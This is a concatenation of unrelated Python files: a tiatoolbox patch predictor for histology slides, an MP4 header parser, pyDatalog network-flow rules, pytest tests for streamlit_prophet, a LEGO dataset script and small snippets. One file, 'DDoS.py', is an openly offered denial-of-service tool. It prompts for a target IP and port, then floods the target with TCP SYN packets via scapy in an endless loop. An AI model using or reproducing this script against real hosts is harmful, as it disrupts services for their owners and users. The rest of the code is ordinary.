>>> # array of list of 2 image patches as input
>>> data = np.array([img1, img2])
>>> predictor = PatchPredictor(pretrained_model="resnet18-kather100k")
>>> output = predictor.predict(data, mode='patch')
>>> # list of 2 image patch files as input
>>> data = ['path/img.png', 'path/img.png']
>>> predictor = PatchPredictor(pretrained_model="resnet18-kather100k")
>>> output = predictor.predict(data, mode='patch')
>>> # list of 2 image tile files as input
>>> tile_file = ['path/tile1.png', 'path/tile2.png']
>>> predictor = PatchPredictor(pretraind_model="resnet18-kather100k")
>>> output = predictor.predict(tile_file, mode='tile')
>>> # list of 2 wsi files as input
>>> wsi_file = ['path/wsi1.svs', 'path/wsi2.svs']
>>> predictor = PatchPredictor(pretraind_model="resnet18-kather100k")
>>> output = predictor.predict(wsi_file, mode='wsi')
References:
[1] Kather, Jakob Nikolas, et al. "Predicting survival from colorectal cancer
histology slides using deep learning: A retrospective multicenter study."
PLoS medicine 16.1 (2019): e1002730.
[2] Veeling, Bastiaan S., et al. "Rotation equivariant CNNs for digital
pathology." International Conference on Medical image computing and
computer-assisted intervention. Springer, Cham, 2018.
""" # noqa: W605
def __init__(
self,
batch_size=8,
num_loader_workers=0,
model=None,
pretrained_model=None,
pretrained_weights=None,
verbose=True,
):
super().__init__()
self.imgs = None
self.mode = None
if model is None and pretrained_model is None:
raise ValueError("Must provide either `model` or `pretrained_model`.")
if model is not None:
self.model = model
ioconfig = None # retrieve iostate from provided model ?
else:
model, ioconfig = get_pretrained_model(pretrained_model, pretrained_weights)
self.ioconfig = ioconfig # for storing original
self._ioconfig = None # for storing runtime
self.model = model # for runtime, such as after wrapping with nn.DataParallel
self.pretrained_model = pretrained_model
self.batch_size = batch_size
self.num_loader_worker = num_loader_workers
self.verbose = verbose
@staticmethod
def merge_predictions(
img: Union[str, pathlib.Path, np.ndarray],
output: dict,
resolution: float = None,
units: str = None,
postproc_func: Callable = None,
return_raw: bool = False,
):
"""Merge patch-level predictions to form a 2-dimensional prediction map.
#! Improve how the below reads.
The prediction map will contain values from 0 to N, where N is
the number of classes. Here, 0 is the background which has not
been processed by the model and N is the number of classes
predicted by the model.
Args:
img (:obj:`str` or :obj:`pathlib.Path` or :class:`numpy.ndarray`):
A HWC image or a path to WSI.
output (dict):
Output generated by the model.
resolution (float):
Resolution of merged predictions.
units (str):
Units of resolution used when merging predictions. This
must be the same `units` used when processing the data.
postproc_func (callable):
A function to post-process raw prediction from model. By
default, internal code uses the `np.argmax` function.
return_raw (bool):
Return raw result without applying the `postproc_func`
on the assembled image.
Returns:
:class:`numpy.ndarray`:
Merged predictions as a 2D array.
Examples:
>>> # pseudo output dict from model with 2 patches
>>> output = {
... 'resolution': 1.0,
... 'units': 'baseline',
... 'probabilities': [[0.45, 0.55], [0.90, 0.10]],
... 'predictions': [1, 0],
... 'coordinates': [[0, 0, 2, 2], [2, 2, 4, 4]],
... }
>>> merged = PatchPredictor.merge_predictions(
... np.zeros([4, 4]),
... output,
... resolution=1.0,
... units='baseline'
... )
>>> merged
... array([[2, 2, 0, 0],
... [2, 2, 0, 0],
... [0, 0, 1, 1],
... [0, 0, 1, 1]])
"""
reader = get_wsireader(img)
if isinstance(reader, VirtualWSIReader):
warnings.warn(
(
"Image is not pyramidal hence read is forced to be "
"at `units='baseline'` and `resolution=1.0`."
)
)
resolution = 1.0
units = "baseline"
canvas_shape = reader.slide_dimensions(resolution=resolution, units=units)
canvas_shape = canvas_shape[::-1] # XY to YX
# may crash here, do we need to deal with this ?
output_shape = reader.slide_dimensions(
resolution=output["resolution"], units=output["units"]
)
output_shape = output_shape[::-1] # XY to YX
fx = np.array(canvas_shape) / np.array(output_shape)
if "probabilities" not in output.keys():
coordinates = output["coordinates"]
predictions = output["predictions"]
denominator = None
output = np.zeros(list(canvas_shape), dtype=np.float32)
else:
coordinates = output["coordinates"]
predictions = output["probabilities"]
num_class = np.array(predictions[0]).shape[0]
denominator = np.zeros(canvas_shape)
output = np.zeros(list(canvas_shape) + [num_class], dtype=np.float32)
for idx, bound in enumerate(coordinates):
prediction = predictions[idx]
# assumed to be in XY
# top-left for output placement
tl = np.ceil(np.array(bound[:2]) * fx).astype(np.int32)
# bot-right for output placement
br = np.ceil(np.array(bound[2:]) * fx).astype(np.int32)
output[tl[1] : br[1], tl[0] : br[0]] = prediction
if denominator is not None:
denominator[tl[1] : br[1], tl[0] : br[0]] += 1
# deal with overlapping regions
if denominator is not None:
output = output / (np.expand_dims(denominator, -1) + 1.0e-8)
if not return_raw:
# convert raw probabilities to predictions
if postproc_func is not None:
output = postproc_func(output)
else:
output = np.argmax(output, axis=-1)
# to make sure background is 0 while class will be 1..N
output[denominator > 0] += 1
return output
def _predict_engine(
self,
dataset,
return_probabilities=False,
return_labels=False,
return_coordinates=False,
on_gpu=True,
):
"""Make a prediction on a dataset. The dataset may be mutated.
Args:
dataset (torch.utils.data.Dataset):
PyTorch dataset object created using
`tiatoolbox.models.data.classification.Patch_Dataset`.
return_probabilities (bool):
Whether to return per-class probabilities.
return_labels (bool):
Whether to return labels.
return_coordinates (bool):
Whether to return patch coordinates.
on_gpu (bool):
Whether to run model on the GPU.
Returns:
:class:`numpy.ndarray`:
Model predictions of the input dataset
"""
dataset.preproc_func = self.model.preproc_func
# preprocessing must be defined with the dataset
dataloader = torch.utils.data.DataLoader(
dataset,
num_workers=self.num_loader_worker,
batch_size=self.batch_size,
drop_last=False,
shuffle=False,
)
if self.verbose:
pbar = tqdm.tqdm(
total=int(len(dataloader)), leave=True, ncols=80, ascii=True, position=0
)
# use external for testing
model = misc.model_to(on_gpu, self.model)
cum_output = {
"probabilities": [],
"predictions": [],
"coordinates": [],
"labels": [],
}
for _, batch_data in enumerate(dataloader):
batch_output_probabilities = self.model.infer_batch(
model, batch_data["image"], on_gpu
)
# We get the index of the class with the maximum probability
batch_output_predictions = self.model.postproc_func(
batch_output_probabilities
)
# tolist might be very expensive
cum_output["probabilities"].extend(batch_output_probabilities.tolist())
cum_output["predictions"].extend(batch_output_predictions.tolist())
if return_coordinates:
cum_output["coordinates"].extend(batch_data["coords"].tolist())
if return_labels: # be careful of `s`
# We do not use tolist here because label may be of mixed types
# and hence collated as list by torch
cum_output["labels"].extend(list(batch_data["label"]))
if self.verbose:
pbar.update()
if self.verbose:
pbar.close()
if not return_probabilities:
cum_output.pop("probabilities")
if not return_labels:
cum_output.pop("labels")
if not return_coordinates:
cum_output.pop("coordinates")
return cum_output
def predict(
self,
imgs,
masks=None,
labels=None,
mode="patch",
return_probabilities=False,
return_labels=False,
on_gpu=True,
ioconfig: IOPatchPredictorConfig = None,
patch_input_shape: Tuple[int, int] = None,
stride_shape: Tuple[int, int] = None,
resolution=None,
units=None,
merge_predictions=False,
save_dir=None,
save_output=False,
):
"""Make a prediction for a list of input data.
Args:
imgs (list, ndarray):
List of inputs to process. when using `patch` mode, the
input must be either a list of images, a list of image
file paths or a numpy array of an image list. When using
`tile` or `wsi` mode, the input must be a list of file
paths.
masks (list):
List of masks. Only utilised when processing image tiles
and whole-slide images. Patches are only processed if
they are within a masked area. If not provided, then a
tissue mask will be automatically generated for
whole-slide images or the entire image is processed for
image tiles.
labels:
List of labels. If using `tile` or `wsi` mode, then only
a single label per image tile or whole-slide image is
supported.
mode (str):
Type of input to process. Choose from either `patch`,
`tile` or `wsi`.
return_probabilities (bool):
Whether to return per-class probabilities.
return_labels (bool):
Whether to return the labels with the predictions.
on_gpu (bool):
Whether to run model on the GPU.
patch_input_shape (tuple):
Size of patches input to the model. Patches are at
requested read resolution, not with respect to level 0,
and must be positive.
stride_shape (tuple):
Stride using during tile and WSI processing. Stride is
at requested read resolution, not with respect to to
level 0, and must be positive. If not provided,
`stride_shape=patch_input_shape`.
resolution (float):
Resolution used for reading the image. Please see
:obj:`WSIReader` for details.
units (str):
Units of resolution used for reading the image. Choose
from either `level`, `power` or `mpp`. Please see
:obj:`WSIReader` for details.
merge_predictions (bool):
Whether to merge the predictions to form a 2-dimensional
map. This is only applicable for `mode='wsi'` or
`mode='tile'`.
save_dir (str or pathlib.Path):
Output directory when processing multiple tiles and
whole-slide images. By default, it is folder `output`
where the running script is invoked.
save_output (bool):
Whether to save output for a single file. default=False
Returns:
(:class:`numpy.ndarray`, dict):
Model predictions of the input dataset. If multiple
image tiles or whole-slide images are provided as input,
or save_output is True, then results are saved to
`save_dir` and a dictionary indicating save location for
each input is returned. The dict has following format:
- img_path: path of the input image.
- raw: path to save location for raw prediction,
saved in .json.
- merged: path to .npy contain merged
predictions if
`merge_predictions` is `True`.
Examples:
>>> wsis = ['wsi1.svs', 'wsi2.svs']
>>> predictor = PatchPredictor(
... pretrained_model="resnet18-kather100k")
>>> output = predictor.predict(wsis, mode="wsi")
>>> output.keys()
... ['wsi1.svs', 'wsi2.svs']
>>> output['wsi1.svs']
... {'raw': '0.raw.json', 'merged': '0.merged.npy'}
>>> output['wsi2.svs']
... {'raw': '1.raw.json', 'merged': '1.merged.npy'}
"""
if mode not in ["patch", "wsi", "tile"]:
raise ValueError(
f"{mode} is not a valid mode. Use either `patch`, `tile` or `wsi`"
)
if mode == "patch" and labels is not None:
# if a labels is provided, then return with the prediction
return_labels = bool(labels)
if len(labels) != len(imgs):
raise ValueError(
f"len(labels) != len(imgs) : " f"{len(labels)} != {len(imgs)}"
)
if mode == "wsi" and masks is not None and len(masks) != len(imgs):
raise ValueError(
f"len(masks) != len(imgs) : " f"{len(masks)} != {len(imgs)}"
)
if mode == "patch":
# don't return coordinates if patches are already extracted
return_coordinates = False
dataset = PatchDataset(imgs, labels)
output = self._predict_engine(
dataset, return_probabilities, return_labels, return_coordinates, on_gpu
)
else:
if stride_shape is None:
stride_shape = patch_input_shape
# ! not sure if there is any way to make this nicer
make_config_flag = (
patch_input_shape is None,
resolution is None,
units is None,
)
if ioconfig is None and self.ioconfig is None and any(make_config_flag):
raise ValueError(
"Must provide either `ioconfig` or "
"`patch_input_shape`, `resolution`, and `units`."
)
if ioconfig is None and self.ioconfig:
ioconfig = copy.deepcopy(self.ioconfig)
# ! not sure if there is a nicer way to set this
if patch_input_shape is not None:
ioconfig.patch_input_shape = patch_input_shape
if stride_shape is not None:
ioconfig.stride_shape = stride_shape
if resolution is not None:
ioconfig.input_resolutions[0]["resolution"] = resolution
if units is not None:
ioconfig.input_resolutions[0]["units"] = units
elif ioconfig is None and all(not v for v in make_config_flag):
ioconfig = IOPatchPredictorConfig(
input_resolutions=[{"resolution": resolution, "units": units}],
patch_input_shape=patch_input_shape,
stride_shape=stride_shape,
)
fx_list = ioconfig.scale_to_highest(
ioconfig.input_resolutions, ioconfig.input_resolutions[0]["units"]
)
fx_list = zip(fx_list, ioconfig.input_resolutions)
fx_list = sorted(fx_list, key=lambda x: x[0])
highest_input_resolution = fx_list[0][1]
if mode == "tile":
warnings.warn(
"WSIPatchDataset only reads image tile at "
'`units="baseline"`. Resolutions will be converted '
"to baseline value."
)
ioconfig = ioconfig.to_baseline()
if len(imgs) > 1:
warnings.warn(
"When providing multiple whole-slide images / tiles, "
"we save the outputs and return the locations "
"to the corresponding files."
)
if len(imgs) > 1:
warnings.warn(
"When providing multiple whole-slide images / tiles, "
"we save the outputs and return the locations "
"to the corresponding files."
)
if save_dir is None:
warnings.warn(
"> 1 WSIs detected but there is no save directory set."
"All subsequent output will be saved to current runtime"
"location under folder 'output'. Overwriting may happen!"
)
save_dir = pathlib.Path(os.getcwd()).joinpath("output")
save_dir = pathlib.Path(save_dir)
if save_dir is not None:
save_dir = pathlib.Path(save_dir)
save_dir.mkdir(parents=True, exist_ok=False)
# return coordinates of patches processed within a tile / whole-slide image
return_coordinates = True
if not isinstance(imgs, list):
raise ValueError(
"Input to `tile` and `wsi` mode must be a list of file paths."
)
# None if no output
outputs = None
self._ioconfig = ioconfig
# generate a list of output file paths if number of input images > 1
file_dict = OrderedDict()
for idx, img_path in enumerate(imgs):
img_path = pathlib.Path(img_path)
img_label = None if labels is None else labels[idx]
img_mask = None if masks is None else masks[idx]
dataset = WSIPatchDataset(
img_path,
mode=mode,
mask_path=img_mask,
patch_input_shape=ioconfig.patch_input_shape,
stride_shape=ioconfig.stride_shape,
resolution=ioconfig.input_resolutions[0]["resolution"],
units=ioconfig.input_resolutions[0]["units"],
)
output_model = self._predict_engine(
dataset,
return_labels=False,
return_probabilities=return_probabilities,
return_coordinates=return_coordinates,
on_gpu=on_gpu,
)
output_model["label"] = img_label
# add extra information useful for downstream analysis
output_model["pretrained_model"] = self.pretrained_model
output_model["resolution"] = highest_input_resolution["resolution"]
output_model["units"] = highest_input_resolution["units"]
outputs = [output_model] # assign to a list
merged_prediction = None
if merge_predictions:
merged_prediction = self.merge_predictions(
img_path,
output_model,
resolution=output_model["resolution"],
units=output_model["units"],
postproc_func=self.model.postproc,
)
outputs.append(merged_prediction)
if len(imgs) > 1 or save_output:
# dynamic 0 padding
img_code = f"{idx:0{len(str(len(imgs)))}d}"
save_info = {}
save_path = os.path.join(str(save_dir), img_code)
raw_save_path = f"{save_path}.raw.json"
save_info["raw"] = raw_save_path
save_as_json(output_model, raw_save_path)
if merge_predictions:
merged_file_path = f"{save_path}.merged.npy"
np.save(merged_file_path, merged_prediction)
save_info["merged"] = merged_file_path
file_dict[str(img_path)] = save_info
output = file_dict if len(imgs) > 1 or save_output else outputs
return output
|
from mp4box.box import MediaHeaderBox
def parse_mdhd(reader, my_size):
version = reader.read32()
box = MediaHeaderBox(my_size, version, 0)
if version == 0:
box.creation_time = reader.read32()
box.modification_time = reader.read32()
box.timescale = reader.read32()
box.duration = reader.read32()
else:
box.creation_time = reader.read64()
box.modification_time = reader.read64()
box.timescale = reader.read32()
box.duration = reader.read64()
data = reader.readn_as_int(2)
box.pad = (data >> 15) & 1
language = data & 0x7FFF
box.language = (
chr(97 + (language >> 10) - 1 % 97)
+ chr(97 + (language >> 5 & 0x1F) - 1 % 97)
+ chr(97 + (language & 0x1F) - 1 % 97)
)
box.predefined = reader.read16()
return box
|
import os
user = os.geteuid()
print(user)
if user != 0:
print("You must be root user!")
else:
print("Hello root user! How are you?")
|
class Solution:
def XXX(self, m: int, n: int) -> int:
dp = [0 for _ in range(n)]
for i in range(m):
for j in range(n):
if i == 0 or j == 0:
dp[j] = 1
else:
dp[j] = dp[j] + dp[j - 1]
return dp[-1]
|
from pyDatalog import pyDatalog
import action
import match
from reg import *
from logicalview import *
from flow_common import TABLE_LSP_EGRESS_FIRST, TABLE_LRP_INGRESS_IP_ROUTE, \
TABLE_EMBED2_METADATA, TABLE_DROP_PACKET, TABLE_OUTPUT_PKT
pyDatalog.create_terms('Table, Priority, Match, Action')
pyDatalog.create_terms('Action1, Action2, Action3, Action4, Action5')
pyDatalog.create_terms('Match1, Match2, Match3, Match4, Match5')
pyDatalog.create_terms('embed_metadata, extract_metadata, pipeline_forward')
pyDatalog.create_terms('redirect_other_chassis')
pyDatalog.create_terms('_gateway_state_sum, gateway_ofport')
pyDatalog.create_terms('_gateway_ofport, _gateway_ofport_readd')
pyDatalog.create_terms('A, B, C, X, Y, Z, UUID_CHASSIS')
# it does not count deleting-element in, because it was only consume by
# adding(_gateway_ofport) below
(_gateway_state_sum[X] == sum_(State, for_each=Z)) <= (
remote_chassis(UUID_CHASSIS, PHY_CHASSIS, State1) &
lr_array(LR, UUID_LR, State2) &
(LR[LR_CHASSIS_UUID] == UUID_CHASSIS) &
(State == State1 + State2) & (State >= 0) &
(X == None) &
(Z == PHY_CHASSIS[PCH_UUID])
)
(_gateway_ofport[X] == tuple_(Y, order_by=Z)) <= (
remote_chassis(UUID_CHASSIS, PHY_CHASSIS, State1) &
lr_array(LR, UUID_LR, State2) &
(LR[LR_CHASSIS_UUID] == UUID_CHASSIS) &
(State == State1 + State2) & (State >= 0) &
(_gateway_state_sum[A] == B) &
(X == ('adding', B)) &
(Y == PHY_CHASSIS[PCH_OFPORT]) &
(Z == PHY_CHASSIS[PCH_UUID])
)
(_gateway_ofport[X] == tuple_(Y, order_by=Z)) <= (
(X == ('deleting', State_DEL)) &
remote_chassis(UUID_CHASSIS, PHY_CHASSIS, State1) &
lr_array(LR, UUID_LR, State2) &
(LR[LR_CHASSIS_UUID] == UUID_CHASSIS) &
(State == State1 + State2) & (State < 0) &
(Y == PHY_CHASSIS[PCH_OFPORT]) &
(Z == PHY_CHASSIS[PCH_UUID])
)
(_gateway_ofport_readd[X] == tuple_(Y, order_by=Z)) <= (
(X == ('readding', State_ADD)) &
(_gateway_ofport[A] == B) & (A[0] == 'deleting') &
remote_chassis(UUID_CHASSIS, PHY_CHASSIS, State1) &
lr_array(LR, UUID_LR, State2) &
(LR[LR_CHASSIS_UUID] == UUID_CHASSIS) &
(State == State1 + State2) & (State >= 0) &
(Y == PHY_CHASSIS[PCH_OFPORT]) &
(Z == PHY_CHASSIS[PCH_UUID])
)
(gateway_ofport[X] == Y) <= (_gateway_ofport[X] == Y)
(gateway_ofport[X] == Y) <= (_gateway_ofport_readd[X] == Y)
# it may output same flows, because we have adding and readding
redirect_other_chassis(Priority, Match, Action, State) <= (
(Priority == 1) &
(gateway_ofport[X] == OFPORT) &
(State == X[1]) & (State != 0) &
match.match_none(Match) &
action.load(1, NXM_Reg(REG_FLAG_IDX, FLAG_REDIRECT_BIT_IDX,
FLAG_REDIRECT_BIT_IDX), Action1) &
action.bundle_load(NXM_Reg(REG_OUTPORT_IDX), OFPORT, Action2) &
action.resubmit_table(TABLE_EMBED2_METADATA, Action3) &
action.resubmit_table(TABLE_OUTPUT_PKT, Action4) &
(Action == Action1 + Action2 + Action3 + Action4)
)
redirect_other_chassis(Priority, Match, Action) <= (
(Priority == 0) &
match.match_none(Match) &
action.resubmit_table(TABLE_DROP_PACKET, Action)
)
embed_metadata(Priority, Match, Action) <= (
(Priority == 0) &
match.match_none(Match) &
action.move(NXM_Reg(REG_DP_IDX, 0, 23),
NXM_Reg(TUN_ID_IDX, 0, 23), Action1) &
action.move(NXM_Reg(REG_SRC_IDX, 0, 15),
NXM_Reg(TUN_METADATA0_IDX, 0, 15), Action2) &
action.move(NXM_Reg(REG_DST_IDX, 0, 15),
NXM_Reg(TUN_METADATA0_IDX, 16, 31), Action3) &
action.move(NXM_Reg(REG_FLAG_IDX, 0, 31),
NXM_Reg(TUN_METADATA0_IDX, 32, 63), Action4) &
(Action == Action1 + Action2 + Action3 + Action4)
)
extract_metadata(Priority, Match, Action) <= (
(Priority == 0) &
match.match_none(Match) &
action.move(NXM_Reg(TUN_ID_IDX, 0, 23),
NXM_Reg(REG_DP_IDX, 0, 23), Action1) &
action.move(NXM_Reg(TUN_METADATA0_IDX, 0, 15),
NXM_Reg(REG_SRC_IDX, 0, 15), Action2) &
action.move(NXM_Reg(TUN_METADATA0_IDX, 16, 31),
NXM_Reg(REG_DST_IDX, 0, 15), Action3) &
action.move(NXM_Reg(TUN_METADATA0_IDX, 32, 63),
NXM_Reg(REG_FLAG_IDX, 0, 31), Action4) &
(Action == Action1 + Action2 + Action3 + Action4)
)
pipeline_forward(Priority, Match, Action) <= (
(Priority == 1) &
match.ip_proto(Match1) &
# a ip packet with 00 macaddress means it was a redirect packet which
# send out by other host, deliver this packet to LR to help redirect
match.eth_dst("00:00:00:00:00:00", Match2) &
match.reg_flag(FLAG_REDIRECT, Match3) &
(Match == Match1 + Match2 + Match3) &
# TABLE_LRP_INGRESS_FIRST table is a tracing-point
# as well and dec_ttl, skip that table
action.resubmit_table(TABLE_LRP_INGRESS_IP_ROUTE, Action)
)
# it is a regular packet, foward to lsp egress table immediately
pipeline_forward(Priority, Match, Action) <= (
(Priority == 0) &
match.match_none(Match) &
action.resubmit_table(TABLE_LSP_EGRESS_FIRST, Action)
)
|
import itertools
import pytest
from streamlit_prophet.lib.dataprep.clean import _log_transform, _remove_rows, clean_future_df
from tests.samples.df import df_test
from tests.samples.dict import make_cleaning_test
@pytest.mark.parametrize(
"df, cleaning",
list(
itertools.product(
[df_test[8], df_test[11], df_test[12]],
[
make_cleaning_test(),
make_cleaning_test(del_days=[6]),
make_cleaning_test(del_days=[0, 1, 2, 3, 4, 5]),
make_cleaning_test(del_zeros=False),
make_cleaning_test(del_negative=False),
],
)
),
)
def test_remove_rows(df, cleaning):
output = _remove_rows(df.copy(), cleaning)
# Output dataframe should have the same number of columns than input dataframe
assert output.shape[1] == df.shape[1]
# Number of distinct days of the week in output dataframe + Number of days removed
# should be equal to number of distinct days of the week in input dataframe
assert (
output.ds.dt.dayofweek.nunique() + len(cleaning["del_days"]) == df.ds.dt.dayofweek.nunique()
)
# Minimum value for y in output dataframe should be positive if del_negative option was selected
if cleaning["del_negative"]:
assert output.y.min() >= 0
# Minimum abs value for y in output dataframe should be strictly positive if del_zeros option was selected
if cleaning["del_zeros"]:
assert abs(output.y).min() > 0
@pytest.mark.parametrize(
"df, cleaning, expected_min, expected_max",
[
(df_test[15], make_cleaning_test(log_transform=True), 0.69, 0.7),
(df_test[16], make_cleaning_test(log_transform=True), 1.09, 1.1),
(df_test[12].loc[df_test[12]["y"] > 0.1], make_cleaning_test(log_transform=True), -10, 10),
],
)
def test_log_transform(df, cleaning, expected_min, expected_max):
output = _log_transform(df.copy(), cleaning)
# y value should be in the expected range in output dataframe
assert output.y.mean() > expected_min
assert output.y.mean() < expected_max
# Output dataframe should have the same shape as input dataframe
assert output.shape == df.shape
# Number of distinct y values should be the same in input and output dataframes
assert output.y.nunique() == df.y.nunique()
@pytest.mark.parametrize(
"df, cleaning",
list(
itertools.product(
[df_test[8], df_test[11], df_test[12]],
[
make_cleaning_test(),
make_cleaning_test(del_days=[6]),
make_cleaning_test(del_days=[0, 1, 2, 3, 4, 5]),
],
)
),
)
def test_clean_future_df(df, cleaning):
output = clean_future_df(df.copy(), cleaning)
# Output dataframe should have the same number of columns than input dataframe
assert output.shape[1] == df.shape[1]
# Number of distinct days of the week in output dataframe + Number of days removed
# should be equal to number of distinct days of the week in input dataframe
assert (
output.ds.dt.dayofweek.nunique() + len(cleaning["del_days"]) == df.ds.dt.dayofweek.nunique()
)
|
#DDoS.py
#Imports:
import os
import sys
import socket
from platform import platform
from os import listdir
os.system('pip3 install scapy')
from scapy.all import *
import threading
version = 'v Alpha 0.3'
def get_ip_address():
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.connect(("8.8.8.8", 80))
return s.getsockname()[0]
# Change version in var
title = '''
A DDoS/ DoS script written in Python, the upgraded version of the Batch version.
srforek
__ _ ___ ___ __ _ ___ __ __ __ __
| \| |_ | __| \| (_ | __ | _\| _\ /__\ /' _/
| | ' |/ /| _|| | ' |/ / |__| | v | v | \/ |`._`.
|_|\__|___|___|_|\__|___| |__/|__/ \__/ |___/
'''+version+'''
:DDoS/ DoS python script:
By editor99
Github repo: https://github.com/Gteditor99/DDOS-Nzen2
Youtube: https://www.youtube.com/channel/UCrxNyJTsVtg5pSq3AYbhiAw
Discord: editor99#6207
'''
logoascii = '''
__ _ ___ ___ __ _ ___ __ __ __ __
| \| |_ | __| \| (_ | __ | _\| _\ /__\ /' _/
| | ' |/ /| _|| | ' |/ / |__| | v | v | \/ |`._`.
|_|\__|___|___|_|\__|___| |__/|__/ \__/ |___/
'''
# Functioan for Main Screen, (mainscr) for easy access.
def mainscr():
os.system("cls")
print(title)
os.system("pause")
mainscr()
os.system("cls")
sc2 = '''
Enter the destination IP Address:
then,
Enter the port:
ex: xxx.xxx.x.x (Enter)
xx (Enter)
(Localhost is the Local IP)
(Port 80 is the most common ICP, HTTP. )
'''
# Function for Second Screen, (secondscr) for easy access.
def secondscr():
os.system('cls')
print(sc2)
print(logoascii)
print(secondscr())
target_ip = input("IP:")
target_port = input("Port:")
destip = target_ip
destport = target_port
packets_sent = 0
def attack():
while True:
p = IP(dst= target_ip) / TCP(flags="S", sport=RandShort(), dport=int(target_port))
send(p , verbose=1, loop=0)
global packets_sent
packets_sent += 1
print(infoui)
infoui = '''
Nzen2-DDoSpy Info screen:
Attack type: TCP flood
Sender IP:
Destination IP: '''+str(destip)+'''
Destination Port: '''+str(destport)+'''
Packets sent: '''+str(packets_sent)+'''
'''
for i in range(0,100):
Thread = threading.Thread(target=attack())
Thread.start()
input("Press Enter to exit:")
# Yo buddy, still alive?
|
#!/usr/bin/env python
import os
import random
import json
import tqdm
import ltron.settings as settings
from ltron.bricks.brick_scene import BrickScene
breakout = {
'4096 - Micro Wheels - AB Truck and Trailer.mpd' : [
'4096 - ab truck.ldr'
],
'8123' : ['8123 - 1.ldr'],
#'8123 - 2.ldr'], # duplicate of - 1 except for button helmet color
'8124' : ['8124 - 1.ldr',
'8124 - 2.ldr'],
'8125' : ['8125 - 8125-1.ldr',
'8125 - 8125-2.ldr'],
'8126' : ['8126 - 8126-1.ldr',
'8126 - 8126-2.ldr'],
'8134' : ['8134 - 8134-1.ldr',
'8134 - 8134-2.ldr',
#'8134 - 8134-3.ldr', # 164 parts, second largest
'8134 - 8134-3-a.ldr', # just the cab please
'8134 - 8134-3-b.ldr', # and actualy the flatbed too
],
'8135' : ['8135 - 8135-1.ldr',
'8135 - 8135-2.ldr',
'8135 - 8135-3.ldr',
'8135 - 8135-4.ldr'],
'8147' : ['8147 - 8147-1.ldr',
'8147 - 8147-2.ldr',
'8147 - 8147-3.ldr', # 104 parts, seems manageable
#'8147 - 8147-4.ldr', # 101 parts, but longer than 8147-3
'8147 - 8147-4-a.ldr', # cab
'8147 - 8147-4-c.ldr', # trailer
'8147 - 8147-5.ldr',
'8147 - 8147-6.ldr',
#'8147 - 8147-7.ldr'], # 121 parts, quite large
'8147 - 8147-7-a.ldr', # but hey! we can separate it out!
#'8147 - 8147-7-b.ldr', # just a connector
#'8147 - 8147-7-c.ldr', # no wheels, long and has strange pieces
'8147 - 8147-7-d.ldr', # end of the trailer
],
'8152' : ['8152 - 8152-1.ldr',
'8152 - 8152-2.ldr',
'8152 - 8152-3.ldr',
'8152 - 8152-4.ldr',
'8152 - 8152-5.ldr'],
'8154' : ['8154 - 8154-1.ldr',
'8154 - 8154-2.ldr',
'8154 - 8154-3.ldr',
'8154 - 8154-4.ldr',
'8154 - 8154-5.ldr',
'8154 - 8154-6.ldr',
#'8154 - 8154-7.ldr', # 202 parts, largest (way too big for 256x256)
'8154 - 8154-7-a.ldr', # cab
#'8154 - 8154-7-b.ldr' # trailer, long weird parts, quite large
'8154 - 8154-8.ldr'],
'8182' : ['8182 - 8182-1.ldr',
'8182 - 8182-2.ldr',
'8182 - 8182-3.ldr',
'8182 - 8182-4.ldr',
'8182 - 8182-5.ldr'],
'8186' : ['8186 - 8186-1.ldr',
'8186 - 8186-2.ldr',
'8186 - 8186-3.ldr',
'8186 - 8186-4.ldr',
'8186 - 8186-5.ldr',
'8186 - 8186-6.ldr',
'8186 - 8186-7.ldr'],
'8196' : ['8196 - 8196-1.ldr',
'8196 - 8196-2.ldr'],
'8197' : ['8197 - 8197-1.ldr',
'8197 - 8197-2.ldr'],
'8198' : ['8198 - 8198-1.ldr',
'8198 - 8198-2.ldr'],
'8199' : ['8199 - 8199-1.ldr',
'8199 - 8199-2.ldr'],
'8211' : ['8211 - 8211-1.ldr',
'8211 - 8211-2.ldr',
'8211 - 8211-3.ldr',
'8211 - 8211-4.ldr',
'8211 - 8211-5.ldr'],
'8681' : ['8681 - 8681-1.ldr',
'8681 - 8681-2.ldr',
'8681 - 8681-3.ldr',
'8681 - 8681-4.ldr',
'8681 - 8681-5.ldr'],
}
# this is a list of tiny turbos sets according to bricklink
# check and see which ones exist in the OMR
# commented out entries have multiple models inside them
# these should probably be manually inspected to see if they have usable
# subdocuments once we have a way to include subdocuments in a dataset
set_numbers = [
'4096',
'4947',
'4948',
'4949',
'6111',
'7452',
'7453',
'7611',
'7612',
'7613',
'7800',
'7801',
'7802',
'8119',
'8120',
'8121',
'8122',
'8123', # multiple models
'8124', # multiple models
'8125', # multiple models
'8126', # multiple models
'8130',
'8131',
'8132',
'8133',
'8134', # multiple models
'8135', # multiple models
'8147', # multiple models
'8148',
'8149',
'8150',
'8151',
'8152', # multiple models
'8153',
'8154', # multiple models
#'8155', # multiple models but doesn't exist in OMR
'8182', # multiple models
'8186', # multiple models
'8192',
'8193',
'8194',
'8195',
'8196', # multiple models
'8197', # multiple models
'8198', # multiple models
'8199', # multiple models
'8211', # multiple models
'8301',
'8302',
'8303',
'8304',
'8595',
'8641',
'8642',
'8643',
'8644',
'8655',
'8656',
'8657',
'8658',
'8661',
'8662',
'8663',
'8664',
'8665',
'8666',
'8681', # multiple models
'30030',
'30033',
'30034',
'30035',
'30036']
existing_sets = {}
tiny_turbos3_path = settings.datasets['tiny_turbos3']
omr_ldraw = os.path.join(os.path.dirname(tiny_turbos3_path), 'ldraw')
all_sets = sorted(os.listdir(omr_ldraw))
for set_number in set_numbers:
for subset_number in range(1,10):
for set_name in all_sets:
if subset_number == 1 and set_name.startswith(set_number + ' '):
if set_number not in existing_sets:
existing_sets[set_number] = []
existing_sets[set_number].append(set_name)
elif set_name.startswith(set_number + '-' + str(subset_number)):
if set_number not in existing_sets:
existing_sets[set_number] = []
existing_sets[set_number].append(set_name)
# manual hack to fix "Black Racer.mpd" which has no set number in the file name
#breakout_paths.append(os.path.join(omr_ldraw, 'Black Racer.mpd'))
existing_sets['Black Racer'] = ['Black Racer.mpd']
print('%i sets found'%len(sum(existing_sets.values(), [])))
breakout_paths = []
scene = BrickScene()
scene.make_track_snaps()
instance_counts = {}
instances_per_scene = []
edges_per_scene = []
all_colors = set()
set_signatures = {}
for set_number, set_list in existing_sets.items():
for existing_set in set_list:
if set_number in breakout:
file_paths = ['%s:%s'%(existing_set, subdocument)
for subdocument in breakout[set_number]]
elif existing_set in breakout:
file_paths = ['%s:%s'%(existing_set, subdocument)
for subdocument in breakout[existing_set]]
else:
file_paths = [existing_set]
